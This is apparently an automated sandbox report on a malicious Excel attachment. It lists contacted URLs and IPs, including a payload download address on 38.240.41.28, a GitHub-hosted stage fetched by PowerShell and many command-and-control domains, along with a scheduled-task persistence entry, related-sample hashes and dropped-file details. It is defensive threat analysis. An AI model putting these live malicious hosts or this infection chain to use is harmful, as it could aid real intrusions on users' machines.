                                                                          http://www.highercall.netReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.spanish-classes-13883.bond/gwdv/www.intelliflow.runexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.3dnu3uix.college/gwdv/www.nasocnite.xyzexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://www.senior-dating-73474.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://ocsp.entrust.net03powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://38.240.41.28powershell.exe, 0000000F.00000002.481286410.0000000002737000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://contoso.com/Licensepowershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.intelliflow.runReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.blackwavetattoostudio.com/gwdv/www.spanish-classes-13883.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.divineworks.storeReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://go.microspowershell.exe, 0000000F.00000002.481286410.0000000002B95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.incronizid.devReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://www.nasocnite.xyzReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.spanish-classes-13883.bond/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfXh;powershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.lingerie-16071.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaneexplorer.exe, 00000017.00000002.638907259.00000000070AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.00000000070AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://contoso.com/powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.lefeetlab.net/gwdv/www.dental-implants-84866.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.lmodt.infoReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.dental-implants-84866.bondReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.accountingcourse06.shopReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.boyxlife.cyou/gwdv/www.blackwavetattoostudio.comexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.senior-dating-73474.bondReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://ocsp.entrust.net0Dpowershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.dental-implants-84866.bond/gwdv/www.boyxlife.cyouexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.nasocnite.xyz/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.spanish-classes-13883.bondReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.blackwavetattoostudio.comexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.incronizid.dev/gwdv/www.lefeetlab.netexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.piriform.com/ccleanerxeexplorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.incronizid.dev/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFC:EQNEDT32.EXE, 0000000A.00000002.457404103.000000000097F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000003.456752146.000000000097F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.lingerie-16071.bond/gwdv/www.accountingcourse06.shopexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.my-tournament.live/gwdv/www.senior-dating-73474.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://crl.entrust.net/server1.crl0powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.3dnu3uix.college/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.nasocnite.xyz/gwdv/Pexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.lmodt.infoexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.senior-dating-73474.bond/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.lefeetlab.netexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.dental-implants-84866.bondexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFjEQNEDT32.EXE, 0000000A.00000002.457404103.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.accountingcourse06.shop/gwdv/www.highercall.netexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://www.my-tournament.live/gwdv/explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.highercall.netexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.piriform.com/ccleanerexplorer.exe, 00000017.00000000.488448630.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.488448630.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.00000000070AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.00000000070AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.3dnu3uix.collegeReferer:explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.incronizid.devexplorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://support.mozilla.orgexplorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://secure.comodo.com/CPS0powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  14.194.50.211
                                                                                                                                                                  m2g.meIndia
                                                                                                                                                                  55441TTSLMEIS-AS-APTTSL-ISPDIVISIONINtrue
                                                                                                                                                                  185.199.108.133
                                                                                                                                                                  raw.githubusercontent.comNetherlands
                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                  38.240.41.28
                                                                                                                                                                  unknownUnited States
                                                                                                                                                                  174COGENT-174UStrue
                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1527625
                                                                                                                                                                  Start date and time:2024-10-07 07:13:09 +02:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 10m 8s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                  Number of analysed new started processes analysed:32
                                                                                                                                                                  Number of new started drivers analysed:1
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • GSI enabled (VBA)
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:PO.78NO9.xls
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLS@536/37@18/3
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 62.5%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 96%
                                                                                                                                                                  • Number of executed functions: 134
                                                                                                                                                                  • Number of non-executed functions: 287
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                                  • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                                  • Active ActiveX Object
                                                                                                                                                                  • Active ActiveX Object
                                                                                                                                                                  • Scroll down
                                                                                                                                                                  • Close Viewer
                                                                                                                                                                  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3168 because there are no executed function
                                                                                                                                                                  • Execution Graph export aborted for target niLILOT.exe, PID 3724 because it is empty
                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2660 because it is empty
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  01:14:48API Interceptor47x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                  01:14:50API Interceptor197x Sleep call for process: powershell.exe modified
                                                                                                                                                                  01:14:50API Interceptor12x Sleep call for process: wscript.exe modified
                                                                                                                                                                  01:15:00API Interceptor113x Sleep call for process: aspnet_regbrowsers.exe modified
                                                                                                                                                                  01:15:02API Interceptor3x Sleep call for process: schtasks.exe modified
                                                                                                                                                                  01:15:05API Interceptor3x Sleep call for process: niLILOT.exe modified
                                                                                                                                                                  01:15:05API Interceptor205x Sleep call for process: taskeng.exe modified
                                                                                                                                                                  01:15:10API Interceptor1344x Sleep call for process: explorer.exe modified
                                                                                                                                                                  01:15:16API Interceptor247x Sleep call for process: mstsc.exe modified
                                                                                                                                                                  22:15:05Task SchedulerRun new task: niLILOT path: C:\Users\user\AppData\Roaming\niLILOT.exe
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  185.199.108.133Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    http://barik-ankita.github.io/Netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      http://mr-zkpak47.github.io/Netflix_Front_PageGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                          http://kartike1103.github.io/NetflixGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            http://sachinchaunal.github.io/Netflix-Clone-Old-VersionGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              https://uni.olga.finance/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                https://swiftclaimairdropmeta.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      raw.githubusercontent.comCompany Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                      na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      COGENT-174USZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 149.92.43.113
                                                                                                                                                                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 38.162.177.151
                                                                                                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 149.52.168.147
                                                                                                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 38.60.198.180
                                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 38.72.19.192
                                                                                                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 38.46.35.55
                                                                                                                                                                                      na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                      • 38.63.117.255
                                                                                                                                                                                      na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                      • 38.116.189.128
                                                                                                                                                                                      na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                      • 154.55.185.244
                                                                                                                                                                                      na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                      • 38.151.122.157
                                                                                                                                                                                      TTSLMEIS-AS-APTTSL-ISPDIVISIONINna.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                      • 49.200.247.241
                                                                                                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 14.195.61.251
                                                                                                                                                                                      botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 14.194.227.99
                                                                                                                                                                                      Z2X8cP8r7S.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 49.248.226.120
                                                                                                                                                                                      fPqdDUeLwj.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                      • 49.200.200.206
                                                                                                                                                                                      ksxhUwe4q5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                      • 182.158.23.255
                                                                                                                                                                                      FkrW3aRKek.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 14.194.50.72
                                                                                                                                                                                      uvaXiyELu9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 14.194.130.217
                                                                                                                                                                                      mg7INGUtNT.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 14.194.239.75
                                                                                                                                                                                      92OyrrVFOt.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                      • 182.158.53.101
                                                                                                                                                                                      FASTLYUSCompany Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      https://maxask.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 151.101.131.42
                                                                                                                                                                                      ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      http://www.ngdhqw.blogspot.de/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                      • 151.101.2.208
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                                      http://milumuduli.github.io/netflix-templateGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      • 185.199.110.153
                                                                                                                                                                                      http://m4xnk.github.io/netflix-clone-by-m4xnkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      • 185.199.111.153
                                                                                                                                                                                      http://gauravchauhan25.github.io/Netflix-CloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      • 185.199.110.153
                                                                                                                                                                                      http://hasnat22.github.io/Netflix-CloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      • 185.199.110.153
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      05af1f5ca1b87cc9cc9b25185115607dls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      na.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                      7dcce5b76c8b17472d024758970a406bPO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 14.194.50.211
                                                                                                                                                                                      No context
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                                      Entropy (8bit):0.025547633048975373
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:I3DPc1wuT5JzRvxggLRJ075pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkwu9bt0tHvYg3J/
                                                                                                                                                                                      MD5:4042A292385DF8F186B5C054491ACD0A
                                                                                                                                                                                      SHA1:15DA9AD1EAF3DC99679AB1B68393C4F4109AFC90
                                                                                                                                                                                      SHA-256:AF884FD136A3CBA99547E1078BDFF203465E2FCB12AF0E1A788A5138A09AE516
                                                                                                                                                                                      SHA-512:DFAD22BF16D892C145C3DDBF5DA164DD7E1445100764378575F8BC7E1177CE4924AD71363FA0D4C1264A481BC54F9B1D705FB9CB9F20FCAD9D435C137A659ABB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:......M.eFy...zrU.D0P.M.....E..S,...X.F...Fa.q...............................8.%H................/]....D..].........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4760
                                                                                                                                                                                      Entropy (8bit):4.834060479684549
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                                                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                                                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                                                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                                                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:@...e...........................................................
